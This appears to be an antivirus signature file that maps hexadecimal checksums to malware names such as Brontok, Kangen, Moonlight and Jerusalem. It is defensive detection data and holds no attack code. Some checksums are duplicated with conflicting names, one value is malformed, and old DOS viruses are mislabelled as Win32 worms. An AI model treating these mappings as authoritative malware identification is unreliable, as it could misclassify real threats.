58329C9B=Pandawa.Autorun
DFD1B32=VBS.Autorun
7C502297=Pandawa.desktop.ini
C92C3456=W32/Pandawa
A60B26F6=Penyiar
FA16F2A=Paray-Rontok
3AB11CED=PaSS
3DDB6DB=Wayang-Pandawa
CEE4FDEE=Peta
D66B6FED=MyTob.Autorun
310C79AD=MyTob
994BE19C=MyTob
7A71D48B=Gutbai1
83720F01=Gutbai2
77988D12=Gutbai3
57A54D0E=Gutbai4
EABE6B50=W32/Topinsuki
84E02635=Plexus
11FFCA6=Undefined.FromRino
3D7741AB=PolyFace
3E6CB45A=Percetakan
CAFDB83A=Renama
1127F30A=Undefined.FromTania
BCD1AA9E=Undefined.FromTania
3470D158=Undefined.VBS
96811927=Undefined.Autorun
AF529E60=SXS
9E8C0142=Undefined.WordIcon
8D804C13=Renova
FC51BE34=HalloRoro
E5A8F5CE=NHQ-Kiss-You
804F5783=Emma-Ellisa
7733FD6C=Revolt
ADCE285F=Trojan/tr.01Cih
C14A0D1D=Trojan/tr.Ashanty
DC4DFB8B=Trojan/tr.Auretania.A
65B763AB=Trojan/tr.Auretania.B
85C801BB=Trojan/tr.Auretania.C
21273CF=Trojan/tr.Auretania.D
FB55A551=Trojan/tr.Auretania.E
D1EAD915=Trojan/tr.Auretania.F
26A32A56=Trojan/tr.Basededatos
F260E8E2=Trojan/tr.Batboy.1.0
E748FE32=Trojan/tr.Idabolon
5251E16F=Trojan/tr.Ifolder
BADE201C=Trojan/tr.InfWin32
56390D4=Trojan/tr.Lab.A
ED1C6374=Trojan/tr.Lab.B
6F441075=Trojan/tr.Lab.C
D5FF82A8=Trojan/tr.Lab.D
43016C5D=Trojan/tr.Lab.E
DAFDDCBE=Trojan/tr.Lab.F
9BD9FB4C=Trojan/tr.Lab.G
4BF1E6B6=Trojan/tr.Lab.H
D5A406F5=Trojan/tr.Lab.I
E36ADE7D=Trojan/tr.Lab.J
BADB490C=Trojan/tr.Lab.K
CF8448A8=Trojan/tr.Ncli386
31D4972=Trojan/tr.Nimda.A
FA149BDB=Trojan/tr.Nimda.B
2B4AA63C=Trojan/tr.Pizniw
98DD52BC=Trojan/tr.Pretty
E38F8BE8=Trojan/tr.Pxniw
34A11419=Trojan/tr.Romandevil
9F99FEA3=Trojan/tr.Ruddoc
5D3AD2AF=Trojan/tr.Searchnet
52D7AB95=Trojan/tr.Smalljpeg
D399C7EF=Trojan/tr.Spysherriff.A
F5BAE0F4=Trojan/tr.Spysherriff.B
4EAC0328=Trojan/tr.Spysherriff.C
3C6C48B4=Trojan/tr.Spysherriff.D
48E9E9BA=Trojan/tr.Spysherriff.E
629AE5B0=Trojan/tr.Spysherriff.F
CFFF6632=Trojan/tr.VB.AQX
BBE97CB3=Trojan/tr.Viking.GU
ADBDC3A8=Trojan/tr.WinKiller
251EA2EC=W97M/w32.Melissa.A
6EB85DB5=Worm/w32.AAlphx
7A273944=Worm/w32.AgnesMonica
75643872=Worm/w32.ABG-Aceh
B0BAB851=Worm/w32.Aidid.A
D0E74DAA=Worm/w32.Aidid.B
8ADB8432=Worm/w32.Ailis.A
A67ACAE9=Worm/w32.Ailis.B
32FFE5D2=Worm/w32.AimVen.A
9DA02403=Worm/w32.AimVen.B
D6C3CCD6=Worm/w32.Aites
32C4F4E2=Worm/w32.Aksika.A
6316FB21=Worm/w32.Aksika.B
E361C855=Worm/w32.Aksika.C
F739DE05=Worm/w32.Aksika.D
3E7D7EC1=Worm/w32.Aksika.E
F67ECB6C=Worm/w32.Aksika.F
99661F3E=Worm/w32.Aksika.G
4BFE6470=Worm/w32.Alcaul.A
A8B63F30=Worm/w32.Alcaul.B
27E48DBD=Worm/w32.Allem.vbs
5DDE1D65=Worm/w32.Alphx
F0A5BE89=Worm/w32.ANF
B60C4D51=Worm/w32.ANF
ACA8BD3C=Worm/w32.ANF
9A6231DC=Worm/w32.Anthrax
E1112FA0=Worm/w32.Apel
F09DB17=Worm/w32.Apel
82812ED=Worm/w32.Apel
9DCC8CDE=Worm/w32.Apel
34A810BE=Worm/w32.Apel
8A1A5CCA=Worm/w32.Apel
5CFC3CAB=Worm/w32.Apel
629CF315=Worm/w32.Apel
17AF4730=Worm/w32.Apel
F46F14E6=Worm/w32.Apel
E2F53983=Worm/w32.Apel
E6AA0705=Worm/w32.Apel
B630D4E2=Worm/w32.Apel
578F75E1=Worm/w32.Apel
BDCC8206=Worm/w32.Apel
F0D79226=Worm/w32.Apel
AD81E654=Worm/w32.Apler.A
BDEE562B=Worm/w32.Apler.B
B1164F25=Worm/w32.Archmime.A
F05E9A66=Worm/w32.Archmime.B
2ED5EA69=Worm/w32.Arequipa.A
DD157A0E=Worm/w32.Arequipa.B
6A0A3B9=Worm/w32.Armora.A
7BBE0BB3=Worm/w32.Armora.B
AA4B1E1F=Worm/w32.Armora.C
FB91CE4F=Worm/w32.Bacalid.A
2697293C=Worm/w32.Bacalid.B
9CECFD00=Worm/w32.Bacalid.VCab
521B31E0=Worm/w32.BAT.Coparer
446873B1=Worm/w32.BAT.Dyene.A
CA540794=Worm/w32.Bethawie
F574510B=Worm/w32.Bharatayudha.A
8AA3ECD2=Worm/w32.Bharatayudha.F
546BCDB9=Worm/w32.Bharatayudha.G
E1D2696F=Worm/w32.Bharatayudha.H
E357B9D4=Worm/w32.Bharatayudha.I
AB7CE7D9=Worm/w32.Billing
B15BE5A3=Worm/w32.BlackLove.A
EAF02BF8=Worm/w32.BlackLove.B
1FE1F9D9=Worm/w32.BlackLove.C
25407EB9=Worm/w32.Blackmal.A
A9AFE8ED=Worm/w32.Blackmal.C
4DA7623A=Worm/w32.Blank
AB220836=Worm/w32.Bluefantasy.A
1B41C55C=Worm/w32.Bluefantasy.B
93AC0AC8=Worm/w32.Bolgi.A
99DA444D=Worm/w32.Bolgi.B
3F077CB3=Worm/w32.Boohoo.A
6C35F64E=Worm/w32.Boohoo.B
5E7F070A=Worm/w32.Borax.A
62DB0603=Worm/w32.Borax.B
E8A89395=Worm/w32.Borlas
9769A541=Worm/w32.Borneo
AE5F3FA8=Worm/w32.Breaker.A
1C89CED7=Worm/w32.Breaker.B
7E281F5C=Worm/w32.Bridge
3A76C92=Worm/w32.Brit.E
6A494139=Worm/w32.Brodon
1E4511A91=Worm/w32.Brontok Chonk.1
1E451A91=Worm/w32.Brontok Chonk.2
6495BB15=Worm/w32.Brontok Chris.1
85D94FFE=Worm/w32.Brontok Chris.2
7FC57D1A=Worm/w32.Brontok Its.A
50F147A1=Worm/w32.Brontok Its.B
603D76F3=Worm/w32.Brontok Its.C
87A9EC6=Worm/w32.Brontok Its.D
9594F9FF=Worm/w32.Brontok.A
58F28F0=Worm/w32.Brontok.AE
2C8FEF37=Worm/w32.Brontok.AN
F440B31B=Worm/w32.Brontok.Brontok-BY
CDFE48FA=Worm/w32.Brontok.Brontok-BY
04ABD508=Worm/w32.Brontok.C
FB778DA=Worm/w32.Brontok.CE
EB1D7059=Worm/w32.Brontok.CX
949DF335=Worm/w32.Brontok.D
2D7F0365=Worm/w32.Brontok.F
11C69832=Worm/w32.Brontok.H
6E641357=Worm/w32.Pendekar Blank
2B59B4D8=pENDEKAR bLANK
21BA46E3=Worm/w32.Brontok.N
5E6B58C7=Worm/w32.Brontok.Q
303E86C0=Worm/w32.Brontok.R
24783AFE=Worm/w32.Brontok.S
624E24FF=Worm/w32.Brontok.T
7D92F304=Worm/w32.Brontok.U
344D0DD7=Worm/w32.Brontok.vbs
1AE30250=Worm/w32.Brontok.Y
34041BA1=Worm/w32.Brontok.Z
C1AC16F3=Worm/w32.Bukan Brontok
26AA44C7=Worm/w32.Bumerang.A
0D11B827=Worm/w32.Bumerang.B
F9AEE6CF=Worm/w32.BVGen.A
B28FE289=Worm/w32.BVGen.B
792DDA6E=Worm/w32.BVGen.C
D06A71C9=Worm/w32.Cih
D3E61EC8=Worm/w32.Cintaku.A
13836400=Worm/w32.Cintaku.A Module
2523B959=Worm/w32.Clown.A
DD7A0BA8=Worm/w32.Code Red.1
1AA1E86F=Worm/w32.Code Red.2
9992EFF7=Worm/w32.Code-X.A
FFF6DFEA=Worm/w32.Code-X.B
5A483177=Worm/w32.Code-X.C
A31B59A5=Worm/w32.Coolface
4D93B2C6=Worm/w32.Copy.A
2B11DBBA=Worm/w32.Crater.A
2FA2B472=Worm/w32.Crater.B
2FEF5574=Worm/w32.Crybot.A
AB124105=Worm/w32.Crybot.B
FFA6A881=Worm/w32.Cuex4.A
FB4F2D03=Worm/w32.Cuex4.B
FE82B701=Worm/w32.Cuex4.C
DFF5C9=Worm/w32.Cyrax.1
1903FBC7=Worm/w32.Cyrax.2
953E6A30=Worm/w32.Cyrax.3
A62EBFB3=Worm/w32.Cyrax.4
E68634FE=Worm/w32.Decoy.A
1F3D15F=Worm/w32.Decoy.B
5F28267C=Worm/w32.Decoy.C
BE9BAE1A=Worm/w32.Decoy.D
B11086F9=Worm/w32.Decoy.E
23359081=Worm/w32.Decoy.F
C200B521=Worm/w32.Decoy.G
55AB5C40=Worm/w32.Decoy.H
15DC0DDA=Worm/w32.Delfer
B85F0EC1=Worm/w32.Delinf.A
486457B8=Worm/w32.Delinf.B
E07EB57D=Worm/w32.Dian Sastro
A7BBC8AF=Worm/w32.Diary.A
12211B51=Worm/w32.Diary.B
6A91DB37=Worm/w32.Diary.C
3AD7C0DD=Worm/w32.Diary.D
F19DA6CF=Worm/w32.Diary.E
D0602DD6=Worm/w32.Diningrat.1
3BEA1FB0=Worm/w32.Diningrat.2
8F705CAF=Worm/w32.Dodol.A
38B5E7E0=Worm/w32.Dodol.B
A283DE70=Worm/w32.Dodol.C
9283E0A1=Worm/w32.Dodol.D
8701C037=Worm/w32.Dora
DEADCA39=Worm/w32.Emma-Lisa
9B2C0040=Worm/w32.Everything
9F96F88C=Worm/w32.Fluburung
92CCA704=Worm/w32.Fluburung Raven.1
F810D4DD=Worm/w32.Fluburung Raven.2
566FFA28=Worm/w32.Fluburung.VB
623562E5=Worm/w32.Fluikan.A
6FE59420=Worm/w32.Fluikan.B
857E3F60=Worm/w32.Fluikan.C
F7FE9AAA=Worm/w32.Gadgev.B
8000D3AD=Worm/w32.Gaggl.A
7CE9DB9A=Worm/w32.Gombel
28AA15FB=Worm/w32.Grogotix
D6C030B4=Worm/w32.Hallo roro.htt
48438917=Worm/w32.Hallo roro.htt
F750FFD2=Worm/W32.Iwing
1388A27=Worm/w32.Hallo roro.htt
8A228480=Worm/w32.Hallo roro.htt
12DBEE50=Worm/w32.Harpot.A
6FA5D852=Worm/w32.Harpot.A
9F02B0C3=HARPOT
5188F1C2=Worm/w32.Influenza
53883270=Worm/w32.Ivp-Vk.A
13888B1D=Worm/w32.Ivp-Vk.B
F750FFD2=Worm/w32.Iwing.vbs
C26CEEFA=Worm/w32.JD!!!
886B3E75=Worm/w32.Jeefo.svchost
7AA11981=Worm/w32.KamaSutra
B46A283C=Worm/w32.Kangen.A
BFC6E421=Worm/w32.Kangen.B
BB2699CD=Worm/w32.Kangen.C
67AD4C6C=Worm/w32.Kangen.E
A5Ba42D9=Worm/w32.Kangen.G
8B51Fa05=Worm/w32.Kangen.H
D660211=Worm/w32.Kangen.I
3B6A8C4E=Worm/w32.Kangen.J
F8997E8C=Worm/w32.Kangen.K
282452D3=Worm/w32.Kangen.L
12EECA8=Worm/w32.Kangen.M
1F79A9C8=Worm/w32.Kantuk
5BE4283=Worm/w32.Kata Mutiara
3991073A=Worm/w32.Kerjaan-Kantor.A
1487BFEB=Worm/w32.Kerjaan-Kantor.B
C8B4593=Worm/w32.Klez.E
6CF483F9=Worm/w32.Klez.H
9DEB6A75=Worm/w32.Lafatih.A
A984512D=Worm/w32.Lafatih.B
CA8BBC1E=Worm/w32.Lafatih.C
B0EEC12F=Worm/w32.Layout.htt
2F0C91F0=Worm/w32.Lina
F1F23AEB=Worm/w32.Lodctr32
35414350=Worm/w32.Love.vbs
9E175A45=Worm/w32.lovgate.R
2DE9E552=Worm/w32.Luna-Maya
5547CE4A=Worm/w32.Luvgate.A
B6CB4EAF=Worm/w32.Magistrar.B
A61B072D=Worm/w32.Majnun
E7E98175=Worm/w32.Mazda
A19EF178=Worm/w32.Mazda
327FFE1A=Worm/w32.Mazda
831D9D94=Worm/w32.Mazda
57C4511D=Worm/w32.Mazda
E6ED95B0=Worm/w32.Mb2c-Vk.A
F81801DA=Worm/w32.Mb2c-Vk.B
84241381=Worm/w32.Mb2c-Vk.C
7661F68F=Worm/w32.Mb2c-Vk.D
14C30A20=Worm/w32.Mb2c-Vk.E
832C1F4A=Worm/w32.Mb2c-Vk.F
4FD25E2D=Worm/w32.Mella-Andalusia
844341B4=Worm/w32.Mellisa.vbs
D433B807=Worm/w32.Mimpi-Indah
A0C5D47E=Worm/w32.Moonlight.Folder.htt
F8275133=Worm/w32.Moonlight.Variant
7C6E31D9=Worm/w32.Moonlight.Variant
019F682E=Worm/w32.Moonlight.Variant
7A014FFF=Worm/w32.Moonlight.Variant
FC166E7=Worm/w32.Moonlight.Variant
5153D21E=Worm/w32.Moonlight.Variant
9F3E1F1A=Worm/w32.Moonlight.Variant
80C47504=Worm/w32.Moonlight.Variant
635E722=Worm/w32.Moonlight.Variant
22B28B95=Worm/w32.Moonlight.Variant
8B664EE9=Worm/w32.Moonlight.Variant
6200B8D8=Worm/w32.Moonlight.Variant
DF8C2C57=Worm/w32.Moonlight.Variant
E364DE42=Worm/w32.Moonlight.Variant
52DF859C=Worm/w32.Moonlight.Variant
6E377789=Worm/w32.Moonlight.Variant
EF531113=Worm/w32.Moonlight.Variant
36EADA66=Worm/w32.Moonlight.Variant
D533356=Worm/w32.Moron
10017CDD=Worm/w32.Mp3.A
51674548=Worm/w32.Mp3.B
89FD494F=Worm/w32.Mr_CoolFace.A
9DEC6FEF=Worm/w32.Mr_CoolFace.B
7FC5BD7C=Worm/w32.Mr_CoolFace.Desktop.
ini
9E1F27CA=Worm/w32.Mydoom.A.3
F4A7E28=Worm/w32.Myheart.A
5874C1AC=Worm/w32.Myheart.B
B086140F=Worm/w32.MyRose.A
5049C2F4=Worm/w32.MyRose.B
87DB5C4F=Worm/w32.MyRose.C
4C571774=Worm/w32.MyRose.D
D60C3A0D=Worm/w32.MyRose.E
61E5B3A8=Worm/w32.Myztx.A
3731DD20=Worm/w32.Myztx.B
D17E6943=Worm/w32.Myztx.C
4BEEFCC3=Worm/w32.Nale.A
65004FB2=Worm/w32.Ncli
3F83E63D=Worm/w32.Netlog
B0CCCC9E=Worm.Nihilit
B59DEFE=Worm/w32.newBrontok
087A9EC6=Worm/w32.newBrontok
324A16AA=Worm/w32.newBrontok
A480F376=Worm/w32.newBrontok
9D5C2C8C=Worm/w32.newBrontok
46237D3F=Worm/w32.newBrontok
1D136654=Worm/w32.newBrontok
CDB3F9AA=Worm/w32.newBrontok
F769C59F=Worm/w32.newBrontok
B0CCCC9E=Worm/w32.Nihilit.vbs
A262DE8F=Worm/w32.Nobron
D1AD5589=Worm/w32.Nuwar.M
6FE146C=Worm/w32.Patahati.A
CE62DD4C=Worm/w32.Patahati.B
C884736A=Worm/w32.Patahati.C
BAA4A636=Worm/w32.PecahGelas.A
8B2BB224=Worm/w32.PecahGelas.B
3B33FEB7=Worm/w32.PecahGelas.C
4420248A=Worm/w32.Pengging
A8A685E5=Worm/w32.Pettick.vbs
45E14D0B=Worm/w32.Pluto.A
06CA24FA=Worm/w32.Pluto.B
51A559B9=Worm/w32.Pluto.C
1CC157CA=Worm/w32.Pluto.D
A685108A=Worm/w32.Pluto.E
6CA24FA=Worm/w32.Pluto.F
8965E905=Worm/w32.Pluto.G
A4ADE89E=Worm/w32.Provisioning.A
E63AEE53=Worm/w32.Provisioning.B
1560742F=Worm/w32.Solow
107486FC=Worm/w32.Solow
B3B78443=Worm/w32.Solow
DFD1B32=Worm/w32.Solow.Variant
2F399732=Worm/w32.Redlof.B
F8A901C=Worm/w32.Redlof.C
76745AE1=Worm/w32.Roes
28B3A591=Worm/w32.Rontokbro.A
56038CCE=Worm/w32.Rontokbro.B
67655C3B=Worm/w32.Rontokbro.C
80C8D7F2=Worm/w32.Rontokbro.D
8442C0B1=Worm/w32.Rontokbro.F
D8D4BC4E=Worm/w32.Rontokbro.G
8504230D=Worm/w32.Rontokbro.I
BFF05A58=Worm/w32.Rontokbro.L
72EC055F=Worm/w32.Rontokbro.N
179B15AB=Worm/w32.Rontokbro.O
B360ABB9=Worm/w32.Rontokbro.Q
935950AF=Worm/w32.Rontokbro.R
A16E04EC=Worm/w32.Rontokbro.T
A58C251C=Worm/w32.Rontokbro.U
A3A95ADC=Worm/w32.Rontokbro.V
8E928ABE=Worm/w32.Runouce.B2
F4D43B51=Worm/w32.RyaniJangkaru.A
840D6B95=Worm/w32.RyaniJangkaru.B
65DFDA75=Worm/w32.RyaniJangkaru.C
A9EB7466=Worm/w32.RyaniJangkaru.D
7DD3EB72=Worm/w32.Salinity
ECABA0DE=Worm/w32.Sasser.B
6FD6666=Worm/w32.Scr Cilal.A
8BC18F3B=Worm/w32.Scr Cilal.B
323BF3F2=Worm/w32.Scr Cilal.C
3A7ED4DF=Worm/w32.Screen Saver.A
AC43BC5D=Worm/w32.Shellynt.A
A1213F22=Worm/w32.Shellynt.B
C57A0CF5=Worm/w32.Sherry.A
98724C92=Worm/w32.Sherry.B
F11602A1=Worm/w32.Sircam
10D08FF9=Worm/w32.Small.Kl
FF8E84A7=Worm/w32.Spider
CD8D5096=Worm/w32.Spoofer
A1D83BFA=Worm/w32.Spyro.Vbs
5BB09CD4=Worm/w32.Spyro.Vbs
B040D849=Worm/w32.Spyro.Vbs
1F2D3AC6=Worm/w32.Spyro.Vbs
E69196C1=Worm/w32.Spyro.Vbs
B3CEB12F=Worm/w32.Stration
5C49F827=Worm/w32.Strong
D9666068=Worm/w32.Super Strong
EA34BA01=Worm/w32.Tuing
A8C8EBCD=Worm/w32.Temp.A
43DD1C22=Worm/w32.Temp.B
A6B8909B=Worm/w32.Ubl
994DE065=Worm/w32.Unmul
76FFB14F=Worm/w32.Valium.vbs
A5E386C2=Worm/w32.Vanguish.Rootk
69FD5019=Worm/w32.Vanguish.Rootk
2E96C330=Worm/w32.Vanguish.Rootk
CDA4A99E=Worm/w32.Vc2000.Vk
8F7563C6=Worm/w32.Vclab.Vk
51DA5587=Worm/w32.Vhack
5BCF19Ac=Worm/w32.Vkit100.Vk
EDF6E09=Worm/w32.Wallpaper
C1955E3F=Worm/w32.Winxp
5E385873=Worm/w32.Worm2007
64F45776=Worm/w32.WSar
ABA71F67=Worm/w32.WSar
BB519524=Worm/w32.WuKill.A
DE39655B=Worm/w32.WuKill.B
674E3BD7=Worm/w32.Wukill.C
EE4A2CE9=Worm/w32.Yarsi
6FA55FED=Worm/w32.Yosa
F6B9B7E5=Worm/w32.Yudizat
BBD6F48B=Worm/w32.Zul
F174408B=Worm/w32.Zulu
C68AF543=Worm/w32.Gendutz
E5FE2F76=Worm/w32.SiKembar
1D62F76A=Worm/w32.VBKill
2A72D2EB=Worm/w32.VBKill
9F8EF70C=Worm/w32.VBKill
C049062B=Worm/w32.VBKill
7C502297=Worm/w32.Pandawa
B8D521E7=Worm/w32.Pandawa
223C3CA=Worm/w32.Pandawa
5D934856=Worm/w32.Pandawa
9DEAC047=Worm/w32.NetGhost.A
3076E541=Worm/w32.Share98
316E9544=Worm/w32.San
31A204F6=Trojan/tr.WindowBomb
33E1823A=Trojan/tr.Hd_format
3560C5C9=Worm/w32.Lame
398FD265=Worm/w32.Psychward
39926689=Trojan/tr.Cybers
39DBCF94=Worm/w32.Dream
3A5631F3=Worm/w32.Kremp
3CDB4E0D=Worm/w32.Charlene
3DA07CCA=Worm/w32.Devolve
3F93449A=Worm/w32.HappyTime
30A0CA3B=Worm/w32.Anja
3127B9A3=Worm/w32.Diversao
32891421=Worm/w32.Jeepwarz
3323DB51=Worm/w32.Buffy
33314C0E=Worm/w32.Showdown
34FA6F41=Worm/w32.Simpsalapim
373A5AAE=Worm/w32.Generic
38806BD0=Worm/w32.Diversao
39E9624B=Worm/w32.Judge
3A2292AE=Worm/w32.Jobbo
3C6E6312=Worm/w32.Gnosis
3DA4D58D=Worm/w32.Antax
3E560FDE=Worm/w32.Generic.Bat
3E97FD66=Worm/w32.Cure
30179C31=Worm/w32.Butcher
303D50D7=Worm/w32.Batalia7
30449348=Worm/w32.Darky
30496FF5=Worm/w32.Prisoncamp
307036EB=Worm/w32.Xreh
3080C90F=Worm/w32.Acid
30D211CB=Worm/w32.Ripost
31083636=Worm/w32.Tnse
31568A5D=Worm/w32.Black
315FA726=Worm/w32.Reinfector
318950E0=Worm/w32.Becky
3259C8D0=Worm/w32.Batalia3
3261C399=Worm/w32.Hoard
32D087F5=Worm/w32.527
32D3C611=Worm/w32.Battler
32EDE4F2=Trojan/tr.Bomb
330DD3ED=Trojan/tr.Repun
3345C791=Worm/w32.Naive
34626883=Trojan/tr.Ansi
3470B0EC=Trojan/tr.Zebumb
348633C2=Worm/w32.Minus
34F22997=Worm/w32.Wnt
35E526CA=Worm/w32.Silly
36811CF9=Worm/w32.PenFold
37093225=Worm/w32.Minus
373AE0DA=Trojan/tr.Deltree
37A54D05=Trojan/tr.FormatC
37C52473=Worm/w32.HexVirus
37C9B3ED=Worm/w32.Radex
37CB6852=Worm/w32.Ibbm
3828BFFE=Worm/w32.Lame
3954076D=Trojan/tr.Fungame
3978B163=Trojan/tr.Ruinator
398B80B3=Worm/w32.Butcher
39E608D8=Worm/w32.RedArc
3A56F866=Worm/w32.Combat
3A73045A=Worm/w32.Batalia5
3AC6C8D9=Worm/w32.Aduh
3B34E446=Worm/w32.Winsys
F174408B=Zulu
3B4716FA=Worm/w32.Bandit
3B6A050B=Worm/w32.Super
3BA569B6=Trojan/tr.Kuhar
3BE1954A=Worm/w32.Firkin
3BE80E65=Worm/w32.ComBat
3C2B5278=Worm/w32.Silly.X
3C44952F=Worm/w32.Silly.U
3C62A734=Worm/w32.Winstart
3CA85C68=Worm/w32.Prelud
3CAEDF44=Worm/w32.Hard
3CC8F3AE=Worm/w32.Ataris.D
3E0BDD70=Worm/w32.Apulia.C
3E9650FB=Worm/w32.ZekeZip
3EA37581=Trojan/tr.Vevat
3ECBB166=Worm/w32.Cold.A
3FFCBF15=Worm/w32.Zert
323CD6C5=Worm/w32.Trivial
3D09ABA4=Worm/w32.Flys.A
300007FC=Worm/w32.H&H
3001039E=Worm/w32.Ps
30052EBD=Worm/w32.V
30055104=Worm/w32.Ps
3006965D=Worm/w32.Ps
3008D94A=Worm/w32.Ps.Alert
3008FBF9=Worm/w32.NRLG-Based
30097A61=Worm/w32.Camel
300CAB18=Worm/w32.Barrotes
301442E8=Worm/w32.Ps
301A0B65=Worm/w32.Vcc
301DE539=Worm/w32.Bw-Based
3020E531=Worm/w32.Flip
30280DD1=Worm/w32.Invader
3028D67D=Worm/w32.Ps
302BA97A=Worm/w32.Jerusalem.A
302D3E22=Worm/w32.Ontario
3030971E=Worm/w32.Eddie
3030C862=Worm/w32.NRLG-Based
3035C7CC=Worm/w32.Grodno
303A69B5=Worm/w32.G2-Based
303D542C=Worm/w32.Ps
303D980C=Worm/w32.NewYear
303F343B=Worm/w32.Ps
303FBDB9=Worm/w32.Vienna
30411E03=Worm/w32.Zun
304802A6=Worm/w32.GI
30497A16=Worm/w32.VKit-Based
304B8868=Worm/w32.Rikki
3050888B=Worm/w32.Tiny
3053D69A=Worm/w32.Australian
3054F6B3=Worm/w32.Rikki
305CEC09=Worm/w32.Apparition
3061CA11=Worm/w32.Joe
3065922E=Worm/w32.Leprosy
30678CFD=Worm/w32.MemLapse
3069DC40=Worm/w32.Rainbow
306B2BC6=Worm/w32.Criminal
3072323C=Worm/w32.Ps
30740D2B=Worm/w32.Ps
307E2F2C=Worm/w32.Horse
3080A80B=Worm/w32.Pixel
30899671=Worm/w32.WMA
308BBD29=Worm/w32.Jerusalem.N
30923C7C=Worm/w32.Cascade
3095E3CA=Worm/w32.Loz
3099B37E=Worm/w32.Yctc
309DD236=Worm/w32.Jerusalem.B
309EF0B0=Worm/w32.Arcv
30A49B72=Worm/w32.Vcl-Based
30A97235=Worm/w32.Vp
30AD5C7A=Worm/w32.Lg
30ADA295=Worm/w32.Huge
30B26508=Worm/w32.Vienna
30B90B13=Worm/w32.Cybertech
30B92D9E=Worm/w32.PS-Based
30B9C65B=Worm/w32.Fumble.A
30BF612E=Worm/w32.Xak
30C58003=Worm/w32.PS-Based
30C6A7CE=Worm/w32.Bw-Based
30C70C10=Worm/w32.PCBB
30C7BDBE=Worm/w32.Mte.E
30C7C7CA=Worm/w32.Monster.A
30C842C5=Worm/w32.Akuku
30C96256=Worm/w32.PS-Based
30CAD65D=Worm/w32.Skater
30CC1C7E=Worm/w32.Zany
30CDCC24=Worm/w32.Intended
30D03E75=Worm/w32.PS.AnotherWorld
30D2F966=Worm/w32.Uruguay
30D43381=Worm/w32.Eddie
30D43D53=Worm/w32.PS-Based
30D8C4C0=Worm/w32.PS-Based
30DFA4AB=Worm/w32.Vcl
30E11B7D=Worm/w32.Walrus
30E2F8E4=Worm/w32.Career
30EAECDF=Worm/w32.Doom
30EBC468=Worm/w32.CyberTech
30ECB2AD=Worm/w32.Trivial
30ECBD17=Worm/w32.Murphy
30F2078B=Worm/w32.BestWishes.A
30F62FEE=Worm/w32.PS-Based
30F643DD=Worm/w32.PS-Based
30F8CF0E=Worm/w32.Antipas
30FD53CC=Worm/w32.PS-Based
3103D466=Worm/w32.Milan
3104AAD9=Worm/w32.PS-Based
31053B91=Worm/w32.PS-Based
31069841=Worm/w32.Vienna
310B4E21=Worm/w32.AAA
3112E8F9=Worm/w32.Grog.B
31152817=Worm/w32.Invader
311918C2=Worm/w32.MBoro
311D222F=Worm/w32.Companion
3124EC82=Worm/w32.PS-Based
312D3E31=Worm/w32.PS-Based
312F88F4=Worm/w32.Murphy
31323A15=Worm/w32.Leonard
3133D5BB=Worm/w32.SanLorenzo
3136939A=Worm/w32.PS-Based
3137AE81=Worm/w32.Smm
3139FE74=Worm/w32.Tpe
3142D3FB=Worm/w32.Smeg
314B5BF5=Worm/w32.Tula
314CA519=Worm/w32.G2-Based
314DA489=Worm/w32.Andromeda.D
31544DBE=Worm/w32.MustDie
31564C16=Worm/w32.Phoenix
3157425A=Worm/w32.PS-Based
3159E355=Worm/w32.Invader
315B76A1=Worm/w32.Ash
315BB0DB=Worm/w32.Phoenix
316229FA=Worm/w32.Nv
31641817=Worm/w32.Ida
31642F68=Worm/w32.Cascade.C
316479D8=Worm/w32.Burger-Based
3164AC26=Worm/w32.Rpme
3165A94C=Worm/w32.Acdc
3166D41D=Worm/w32.Burma.B
316F26F9=Worm/w32.Vcc
3173297F=Worm/w32.Search
317DE7D2=Worm/w32.PS-Based
31807401=Worm/w32.Vcl-Based
31815A09=Worm/w32.PS-Based
31858388=Worm/w32.Bw-Based
318664C4=Worm/w32.Rainbow
318A9725=Worm/w32.Dutch_Tiny.A
318F917D=Worm/w32.Espacio
31912E82=Worm/w32.Zulu
3192DD9B=Worm/w32.Jerusalem.B
31947F3E=Worm/w32.SillyRC
3194EF5E=Worm/w32.Intended
3196D971=Worm/w32.PS-Based
31995DF0=Worm/w32.C&Y
3199ED32=Worm/w32.PS-Based
319CCEA5=Worm/w32.Storm
319CFA02=Worm/w32.PS-Based
31A01D42=Worm/w32.Yankee
31A066BE=Trojan/tr.TimeBomb.A
31A21773=Worm/w32.Pcbb.B
31A3070F=Worm/w32.Csl
31A3766B=Worm/w32.Ansibomb
31ADD4B0=Worm/w32.PS-Based
31AEEEEF=Worm/w32.PS-Based
31B3BB2B=Worm/w32.Grog
31B4D585=Worm/w32.Jerusalem.A
31BB6050=Worm/w32.Corrupted
31C0387F=Worm/w32.AAA
31C4AAEA=Worm/w32.SillyRC
31C562EE=Worm/w32.LittBrother
31C65A0E=Worm/w32.Riot
31C9552F=Worm/w32.A2Space
31C995E2=Worm/w32.Vienna
31CDBD72=Worm/w32.Jerusalem.A
31CDC2BD=Worm/w32.Shanghai_II
31D150CE=Worm/w32.Corrupted
31D72669=Worm/w32.Sundevil
31DE5563=Worm/w32.Camel
31E0CBAD=Worm/w32.Dame
31E13561=Worm/w32.Friday13
31E3DB90=Worm/w32.SillyC
31E67677=Worm/w32.Vcl-Based
31EA116A=Worm/w32.PS-Based
31EC49DD=Worm/w32.Unkm
31EEE912=Worm/w32.HellAwaits
31F48CE3=Worm/w32.Bw.Pelican
320381D5=Worm/w32.Plutto
3206DDFD=Worm/w32.Anna
320834AD=Worm/w32.Vienna
320DAF9E=Worm/w32.Riot
320DF9A4=Worm/w32.Vienna
320E1DE1=Worm/w32.Cascade
32148FAD=Worm/w32.Ace
32172660=Worm/w32.Australian
3217FBAE=Worm/w32.Oxana
321891E5=Worm/w32.PS-Based
321A02D4=Worm/w32.Nov7
321B0512=Worm/w32.Grodno.A
321C2646=Worm/w32.Jerusalem.B
321E8583=Worm/w32.PS-Based
321F802F=Worm/w32.Leprosy
3221CB0D=Worm/w32.PS-Based
3228FC6D=Worm/w32.PS-Based
322D3BBD=Worm/w32.Beer
322F5E87=Worm/w32.Vcl-Based
3230CC70=Worm/w32.Corrupted
323276DD=Worm/w32.PS-Based
323A87B0=Worm/w32.Cascade
323D1177=Worm/w32.Alicia
323EB359=Worm/w32.HelloUser
32401692=Worm/w32.SillyRC
32470EC3=Worm/w32.PS-Based
3249B594=Worm/w32.PS-Based
324D1EF5=Worm/w32.Loz.B
32522B52=Worm/w32.Csf
3253DFA1=Worm/w32.Microb
32551EF3=Worm/w32.Flip
325612AF=Worm/w32.Macedonia
32580244=Worm/w32.Ivp-Based
325EFB63=Worm/w32.Vienna.A
326A07CC=Worm/w32.Mrti
